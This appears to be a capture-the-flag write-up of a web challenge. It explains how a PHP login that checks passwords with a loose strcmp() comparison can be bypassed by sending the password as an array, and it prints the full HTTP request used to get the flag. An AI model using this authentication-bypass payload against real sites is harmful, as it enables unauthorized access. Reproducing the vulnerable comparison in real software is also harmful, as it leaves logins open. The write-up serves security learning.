Web 200
This question was about a flaw of PHP function in compensation. The source was given and following lines were interesting again:
<?php include("./otp_util.php"); $flag = file_get_contents($flag_file); if (isset($_POST["id"]) && isset($_POST["ps"])) { $password = make_otp($_POST["id"]); sleep(3); // do not bruteforce if (strcmp($password, $_POST["ps"]) == 0) { echo "welcome, ".$_POST["id"].""; echo ""; if ($_POST["id"] == "127.0.0.1") { echo " pre>
".$flag.""; } } else { echo "<script>alert('login failed..');history.back();"; } } ?>
If $_POST['ps'] is an array, the strcmp() returns NULL which is equals to 0 (not in type but in absolute value):
$ php -r "var_dump(strcmp('anything',array()));" // returns NULL
So, I got flag by following HTTP request:
POST /site/page/login_ok.php HTTP/1.1 Host: 58.229.122.15:31338 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://58.229.122.15:31338/site/ Connection: keep-alive Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Content-Length: 19 id=127.0.0.1&ps[]=blah